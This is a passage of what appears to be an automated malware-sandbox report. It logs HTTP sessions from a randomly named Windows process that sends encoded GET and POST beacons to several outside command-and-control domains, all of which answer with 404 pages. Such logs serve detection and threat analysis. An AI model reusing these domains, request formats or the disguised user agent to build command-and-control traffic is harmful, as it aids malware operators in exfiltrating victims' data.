                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session ID: 32 | Source IP: 192.168.2.6 | Source Port: 50022 | Destination IP: 209.74.77.107 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp: Nov 27, 2024 08:56:17.466828108 CET | Bytes transferred: 502 | Direction: OUT | Data: GET /alu5/?Kp=6N8LUn6pGPW&6dr=m83uTjDkEXAXcvpaGmUoJ8Y4XcRIkh2fMbxp9Jcjydk1OP9q/x+Uq7Puqw1bWxP8wchYD7Gqx/Fq8mp+rVpxo2CL5VTj7SrR/OegDMXRn69R6rST1isaHd8Em6LhDwUu8jHHb1w= HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.learnwithus.site
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Timestamp: Nov 27, 2024 08:56:18.770761967 CET | Bytes transferred: 548 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:56:18 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session ID: 33 | Source IP: 192.168.2.6 | Source Port: 50023 | Destination IP: 104.21.34.103 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp: Nov 27, 2024 08:56:32.873037100 CET | Bytes transferred: 782 | Direction: OUT | Data: POST /1jao/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.rafconstrutora.online
                                                                Origin: http://www.rafconstrutora.online
                                                                Referer: http://www.rafconstrutora.online/1jao/
                                                                Cache-Control: no-cache
                                                                Content-Length: 208
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 39 56 32 69 47 6c 47 39 33 38 77 42 4a 54 49 35 61 6a 65 54 4a 58 46 63 39 38 61 65 63 4a 71 30 68 6b 4b 42 50 69 34 49 6a 4b 4f 36 36 71 39 66 38 79 41 55 51 45 71 2f 48 68 4f 48 75 54 73 31 45 5a 51 76 49 68 76 72 30 62 4c 43 4d 4e 43 58 72 48 39 41 68 41 63 79 5a 75 7a 4f 65 6f 74 77 6a 5a 75 6b 45 33 4a 34 74 2b 48 6b 39 49 39 4d 45 30 36 47 43 4d 66 31 74 77 63 63 64 7a 4e 68 37 45 77 35 53 4d 4f 53 78 44 31 56 52 41 5a 43 57 54 65 6a 70 77 54 31 6a 58 35 2f 55 43 50 38 6c 70 38 67 45 59 6f 2f 59 4b 64 4e 32 38 6c 2b 34 37 32 70 4e 79 6f 68 70 62 4d 2b 6c 7a 78 41 50 4b 54 43 59 43 47 66 4b 65 55 41
                                                                Data Ascii: 6dr=9V2iGlG938wBJTI5ajeTJXFc98aecJq0hkKBPi4IjKO66q9f8yAUQEq/HhOHuTs1EZQvIhvr0bLCMNCXrH9AhAcyZuzOeotwjZukE3J4t+Hk9I9ME06GCMf1twccdzNh7Ew5SMOSxD1VRAZCWTejpwT1jX5/UCP8lp8gEYo/YKdN28l+472pNyohpbM+lzxAPKTCYCGfKeUA
                                                                Timestamp: Nov 27, 2024 08:56:34.006324053 CET | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:56:33 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                Vary: Accept-Encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FudBy%2F2nHlDSqzVhDRlK9z5FjTpldXd3xeCquWeJTii5329YoqRKUDQ7q38J%2Bu7Q9qSuydJTp1gnGLGv4%2FDuJknMToK1VsvyDApNxAVHNA%2Bj0H84Kja1JgdNF3PajcgEm0BzfKaCC87R%2BmdC"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e908ff71eae7cb1-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1995&rtt_var=997&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=782&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 [TRUNCATED]
                                                                Data Ascii: 33fnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2
                                                                Timestamp: Nov 27, 2024 08:56:34.006381989 CET | Bytes transferred: 499 | Direction: IN | Data Raw: 01 73 3e eb e6 b3 a7 32 97 43 e6 72 d6 2d 9f cc 0c a3 c5 00 1a 46 8b 2e 8c 16 e2 99 5a 2e c3 e5 b0 61 e1 32 ea c2 e5 43 2d 53 75 5d a2 f4 d4 e8 42 3e 52 c2 f8 4c c2 b8 0b a3 f1 b3 a6 98 9e a9 98 46 5d 38 7d 5e 15 8b 33 15 8b 71 17 2e ce 54 9c b1
                                                                Data Ascii: s>2Cr-F.Z.a2C-Su]B>RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp wVKz


                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                34          192.168.2.6  50025        104.21.34.103   80                4872  C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                Nov 27, 2024 08:56:35.538594961 CET  806                OUT        POST /1jao/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.rafconstrutora.online
                                                                Origin: http://www.rafconstrutora.online
                                                                Referer: http://www.rafconstrutora.online/1jao/
                                                                Cache-Control: no-cache
                                                                Content-Length: 232
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Ascii: 6dr=9V2iGlG938wBbhc5JSeTenFf+8aeF5qwhkGBPncYj8+69O5f9zAUXEq/MBOGtjsAEZVQIlzr0b3CMMyXrwpPjQcwROzAB4twjZukEzhet+vkhrVMCV6HMsf2qwccLDNl7ExcSJysxAdVRBpCXCegnATsnX4fdDuSnv8nAOAtZNFO+q4kkI2KfiIjpZUMlTxqNKrCKVK4FqxjUZnnUGn7r/E2cRV1I4bz4Q==
                                                                Nov 27, 2024 08:56:36.721002102 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:56:36 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                Vary: Accept-Encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FHXe%2F5nuGHGKHSl%2BPfc8XD8YM6jkH1NcdYQsI3k3fCAqTjnDWD0UH0DxMifz%2Beawk59vkNbrMhvQb%2Bjaq90w2c2vWR%2BvesY7YYwlo0iZfJ3Ub7KNz886Ujh5tnUsIsSbGauL2kJjkeGoappk"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e90900809f56a52-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2217&min_rtt=2217&rtt_var=1108&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=806&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Ascii: 33fnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:
                                                                Nov 27, 2024 08:56:36.721071959 CET  502                IN         Data Raw: (hex dump omitted)
                                                                Data Ascii: 2s>2Cr-F.Z.a2C-Su]B>RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp wV


                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                35          192.168.2.6  50026        104.21.34.103   80                4872  C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                Nov 27, 2024 08:56:38.205075979 CET  1819               OUT        POST /1jao/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.rafconstrutora.online
                                                                Origin: http://www.rafconstrutora.online
                                                                Referer: http://www.rafconstrutora.online/1jao/
                                                                Cache-Control: no-cache
                                                                Content-Length: 1244
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Nov 27, 2024 08:56:39.338416100 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:56:39 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                Vary: Accept-Encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sV2IaYCpixNYe3mqFXVSM%2FO3eeGrybftA0%2BMR9pMF%2B8hVEy%2FeYIPqVj7JxraMj1NX99bne%2Bo6RAoWNHsXYxOhC9uJ12VFoaVXIOh27%2FFc4eJLywhD1qmAK1bnIff%2BijPwZXeF6dSdEhMTsd6"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e9090187d9b4380-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1599&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1819&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Ascii: 34bnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>2Cr-
                                                                Nov 27, 2024 08:56:39.338449955 CET  474                IN         Data Raw: (hex dump omitted)
                                                                Data Ascii: F.Z.a2C-Su]B>RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp wVKz =tdd


                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                36          192.168.2.6  50027        104.21.34.103   80                4872  C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                Nov 27, 2024 08:56:40.873210907 CET  507                OUT        GET /1jao/?6dr=wXeCFQWa9OsffQZ2WhWSf1ZyxcnJa4mUhyyCbFo+uZizrpQ17AwBRErPIC2GsWEsFfVeFw/t98C8OszppSdM03IMcNL7coNMrr+HJhleldbbhLhSE02VC7Ooq1hKOjwi60t3Eow=&Kp=6N8LUn6pGPW HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.rafconstrutora.online
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Nov 27, 2024 08:56:42.065346003 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:56:41 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                Vary: Accept-Encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kRZ6d1xnVR99One%2BLuNtarSbt7v4HAW8CLWticqQmJvnwDuGpL6DPHmNPkEn0wqYWSL0Uwx62zrzxgNEERwprlPCz%2Bze%2FcUOaQa4QrkoJRTULg%2F2qyaLMSjk7VvPmT33SvMLDRaUpbQzJoLT"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e9090296f8e18d0-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1556&min_rtt=1556&rtt_var=778&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=507&delivery_rate=0&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Ascii: 939<!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title>
                                                                Nov 27, 2024 08:56:42.065392017 CET  1236               IN         Data Raw: (hex dump omitted)
                                                                Data Ascii: <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"
                                                                Nov 27, 2024 08:56:42.065407038 CET  750                IN         Data Raw: (hex dump omitted)
                                                                Data Ascii: <h1><strong>Ops,</strong><br>No encontramos<br>essa pgina!</h1> <p>Parece que a pgina que voc est procurando foi movida ou nunca existiu, certifique-se que digitou o endereo corretamente ou seguiu um link vli


                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                37          192.168.2.6  50028        20.2.249.7      80                4872  C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                Nov 27, 2024 08:56:50.172189951 CET  749                OUT        POST /n7xy/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.7vh2wy.top
                                                                Origin: http://www.7vh2wy.top
                                                                Referer: http://www.7vh2wy.top/n7xy/
                                                                Cache-Control: no-cache
                                                                Content-Length: 208
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Ascii: 6dr=wm6hxzKaeG18XThml7sXwPKZJ4h8IGsG+Y3jgi2Ovb+8NglK3+Q41DUbsXC6D4mOPtk3DKCb80FAch6jjrtG++LCCSXzfgFaY0R4aGvwYs4slCi3htaQK0espv5ONV6eb8G74mZ5+oCZPn250M5qBw/xWsnrs8wxh6XS+nAi81oklBNrCM4tc5Gs06bBIvy6c7zwlBeM/3Tq
                                                                Nov 27, 2024 08:56:51.774771929 CET  289                IN         HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:56:51 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                38          192.168.2.6  50029        20.2.249.7      80                4872  C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                Nov 27, 2024 08:56:52.847362041 CET  773                OUT        POST /n7xy/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.7vh2wy.top
                                                                Origin: http://www.7vh2wy.top
                                                                Referer: http://www.7vh2wy.top/n7xy/
                                                                Cache-Control: no-cache
                                                                Content-Length: 232
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Ascii: 6dr=wm6hxzKaeG18VyxmmY0Xn/KWXoh8HmsC+YrjgjzDupq8NFBKt9I4yDUbn3C/eomFPt5CDP6b80RAcgKj/M5Z/uLANyX9BQFaY0R4aCPWYvIskyS3gMaXUkevgP5Oal6ab8He4nFf+r6ZPjm53d5pIw+0bMmgnI9ckqbU+BQ+rVghg3Qxe/4OOpmu04DzIPyQe7Lw3WSrwD2JM5nuC05CHOuwKYAek75KoQ==
                                                                Nov 27, 2024 08:56:54.440880060 CET  289                IN         HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:56:54 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                39          192.168.2.6  50030        20.2.249.7      80                4872  C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                Nov 27, 2024 08:56:55.554179907 CET  1786               OUT        POST /n7xy/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.7vh2wy.top
                                                                Origin: http://www.7vh2wy.top
                                                                Referer: http://www.7vh2wy.top/n7xy/
                                                                Cache-Control: no-cache
                                                                Content-Length: 1244
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Nov 27, 2024 08:56:57.113641024 CET  289                IN         HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:56:56 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                40          192.168.2.6  50031        20.2.249.7      80                4872  C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:56:58.214248896 CET496OUTGET /n7xy/?6dr=9kSByHmOdk8FUTJoiY9dxdy2O5k/Hm0rzNXDmTbYjaiqM3Vah8l/01w+tC+kGtOMFeVLDvKv+EgDTRurueNShPDfBTXGcQl1Rn1iXwPoeM4M+DqRn9nIdXP5s7w9IXv4aM6Qswk=&Kp=6N8LUn6pGPW HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.7vh2wy.top
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Timestamp: Nov 27, 2024 08:56:59.823905945 CET | Bytes transferred: 289 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:56:59 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID: 41 | Source IP: 192.168.2.6 | Source Port: 50032 | Destination IP: 156.251.17.224 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp: Nov 27, 2024 08:57:05.537626028 CET | Bytes transferred: 758 | Direction: OUT | Data: POST /q0vk/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.duwixushx.xyz
                                                                Origin: http://www.duwixushx.xyz
                                                                Referer: http://www.duwixushx.xyz/q0vk/
                                                                Cache-Control: no-cache
                                                                Content-Length: 208
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
